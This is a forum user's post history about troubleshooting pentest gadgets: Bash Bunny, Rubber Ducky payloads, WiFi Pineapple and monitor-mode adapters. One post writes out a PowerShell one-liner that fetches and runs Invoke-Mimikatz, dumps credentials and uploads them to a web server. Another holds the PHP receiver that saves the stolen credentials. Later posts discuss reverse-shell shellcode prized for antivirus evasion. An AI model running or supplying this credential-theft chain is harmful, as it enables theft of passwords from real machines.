Jump to content

TeCHemically

Active Members
  • Posts

    131
  • Joined

  • Last visited

Posts posted by TeCHemically

  1. On 11/19/2017 at 1:25 PM, kdodge said:

    It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on

    
    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
    if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
    ?>

    run tcpdump with this to see if it's not writable.

    Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

     

    So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!

  2. I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: 

    powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

    Here is the PHP script:

    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
    ?>

     

    it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference):

    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

    file_put_contents($file, file_get_contents("php://input"));
    ?>
     

    Thanks to any who reply!

  3. So, the ducknunter on nethunter uses 2 different elements to inject strings. One being STRING, like normal, and the other being TEXT. When you use STRING, the LF at the end of your line is interpreted as an ENTER keystroke. If you just want to enter a string then you need to use the TEXT element instead. I can see how this could make your scripts more efficient; but unless you know about this it just drives you crazy. Hope this helps someone!

  4. I am unable to use scripts that open CMD as admin because phantom ENTER lines are bring executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are bring entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there anyway to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!

  5. I have not had any success with my bash bunny since I bought it on the day it launched. Install tools has never worked, no matter what workarounds have been posted to try. The payloads dont execute properly with the exception of a couple ducky payloads that executed a few times with issues. Now even the ducky script payloads fail to respond. I get no lights at all when trying to run the install tools payload. I would like to speak with someone about a replacement. This device has never worked and it does not behave at all like the readme files state it should. I fought with it so long that I just set it down for a few months and picked it back up again today. Still its a whirlwind of fail. Please help me out here. I was so excited about this platform that I bought it on day one. I believe there is just some issue with the specific device I received. Any help and guidance is greatly appreciated!

  6. 20 hours ago, digip said:

    Yeah, if you got it on the hak shop, then should be working. I know that the NEH model, is hit or miss for some people, and don't always have the actual same chipset, depending where you get them. It's one of the least fav cards by people.

    http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html

    Other than the card, what is your setup and what are you monitoring? If you have a home wifi router to test with, try connecting and disconnecting from it a few times with another device while in monitor mode and wireshark is going, or airodump. Make sure to start airodump on a specific channel, not to start it without a channel selected, can skew your chances of seeing anything connect. Monitoring a single channel at a time generally gets best results.

    I got airodump results on a different laptop. Do you know if the cards in the hakshop are NEH or NHA? If this wont work on my main rig then I'm going to have to return it. Shame too. It was a great price. I hope Darren isn't carrying the crap shoot card that contains inconsistent chipsets.

  7. 16 hours ago, digip said:

    Are you sure it's a compatible card? Find out what driver is loaded for it.

    https://www.aircrack-ng.org/doku.php?id=compatibility_drivers

     

    Post dmesg and any other out put you may have when bringing it up and starting monitor mode. That should help others get an idea what is happening. If you have network manager running, I suggest killing it before trying any monitor mode stuff.

    By the way, if it's the "AWUS036NEH", that might be the one that is not compatible or have drivers, but I could be wrong. I've got a AWUS036NHA though. Mine works with monitor and injection, but can't do evil twin since it has only one antenna/input, and not mimo like some of the other cards.

     

    Thanks for the reply. I did kill network manager prior to use ; and this is the card Daren is selling in the hakshop. It says it works out of the box. I'll post dmesg as sson as I can.

     

  8. I just got the RT3070 usb adapter and airodump isn't working on any OS. Tried 3 systems so far and every one of them shows all blank once the card is in mon mode and I start airodump. I ran check kill so nothing is interfering with it. What's the deal with this card? Any help is appreciated.

  9. On 5/4/2017 at 2:55 PM, RazerBlade said:

    Hello there! 

    I recently purchased my WiFi Pineapple after purchasing the Bash Bunny and the Rubber Ducky because the tools were excellent and well maintained. I thought it would be this great seamless experience with the pineapple as the other Hak5 devices but I was wrong. To begin with, the device and it's software is filled with bugs and the latest release was about 7 months ago! Of course the bugs may not break the device completely but it adds to a bad user experience where you realize you can't use a sdcard to install modules because of a kernel bug. Numerous bugs I have encountered are random shutdowns, recon stuck at 100%, pineap not starting or stopping and this is also present in many modules. This makes the device in a way useless because when you want to try to use because the bugs are always ruining the attack. Most of the bugs I have encountered are on the bugs tracker list and an ETA from Hak5 when the next firmware release would be highly appreciated! The problems may be hardware based but because the are already on the bug tracker list, I doubt it.

    I have to agree that the vast majority of the time I have spent with my pineapples has been in troubleshooting, factory resetting, re-flashing, etc. The tool has great promise; but has never been stable for me in any true long term or feasible "deployment" sense. It has been fun to play with, while I'm not screaming at it for bugs I am fighting with; but I have never gotten any iteration to function in a consistent and stable way...and my first pineapple was a fon I built myself. So, I'm not talking about a passing fancy here. I've been involved with these things all the way up to the Mark V. Given my issues, and the fact that support for older models drops off very quickly, I just cant justify purchasing either of the newer models. Sad :(

    • Upvote 2
  10. Found this; so I am factory resetting now. Hopefully this solves the issue. If anyone knows what is going on please do reply.:

    You can use the DIP switches to perform a factory reset but it sounds like you may be using the wrong switches or not using the correct procedure. Try this:

    NOTE: With the switches facing you, they are ordered 1 - 5 from left to right.

    1) Power off your Pineapple.

    2) Place your DIP switches in the following sequence:

    Switch 1 - UP

    Switch 2 - DOWN

    Switch 3 - DOWN

    Switch 4 - UP

    Switch 5 - UP

    3) Power on your Pineapple

    4) Wait 5 minutes just to be safe and power off again

    5) Place all of your switches back in the up position again and power on.

    You should be good to go. Just connect via ethernet or Wifi, login to the web interface, and create a new password.

  11. I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.

  12. I have minimized several infusions and now they will not come back to the interface. Configuration is one of them so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can i restore the infusions so they are accessible?

  13. Mode G appeared successful; but I was never able to get connected via sceen to verify the bunny could get out. I am on an ubuntu based distro. I tried ECM and RNDIS. RNDIS listed as ttyACM0 for a time; but now it wont list as a tty at all whether ECM or RNDIS. Even after reboots. It just seems absent for some reason; although it shows the eth1 in ifconfig

  14. My bashbunny does not show a device in Win7 and the devmgr shows under "other devices" a "RNDIS" entry with the yellow exclamation symbol indicating driver failure. Trying to point it to the bunny as suggested for the similar problem for CDC Serial driver issues does not help. I followed the steps here as far as i could: http://wiki.bashbunny.com/?_escaped_fragment_=././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows#!././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows

     

    I've not had any success installing tools, connecting to internet, or anything else so far. It's been a pretty big let down for a first day. Any guidance is appreciated!

  15. I have setup and confirmed the funcitonality of this payload via tcpdump; but the Invoke mimikatz payload's "rx.php" fails to create .creds files. Confirmed appropriate permissions on the php script for www-data. Still nothing is created and no creds are captured. I can see them get sent to the server via packet capture; but if that's not running I don't ever see the creds files the rx.php script is supposed to create.

  16. Has anyone gotten the poisontap to work successfully? It appears to function properly when looking at tcpdump on the target; but I never get anything reaching out to the nodejs control server. Also, how does one interact with the nodejs server? Navigating to the server's interface:port give a "sorry unknown url" error.

  17. Ettercap and sslstrip will not install on my MK5. Notifications says they install successfully; but when I go back to the infusion list is says they need to be updated again. I have tried removing and rebooting but no love. Still does the same thing on these 2 infusions.

  18. This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error:

    [*] Generating shellcode
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    Found 0 compatible encoders
    reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
    from reverse_powershell_ducky.rb:51:in `clean_shellcode'
    from reverse_powershell_ducky.rb:45:in `shellcode_gen'
    from reverse_powershell_ducky.rb:90:in `<main>'

    Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability

    Also, would it be possible to have this script accept domain names as well as IP addresses?

  19. Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

    ~skysploit

    WOW, just...WOW man...the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D

×
×
  • Create New...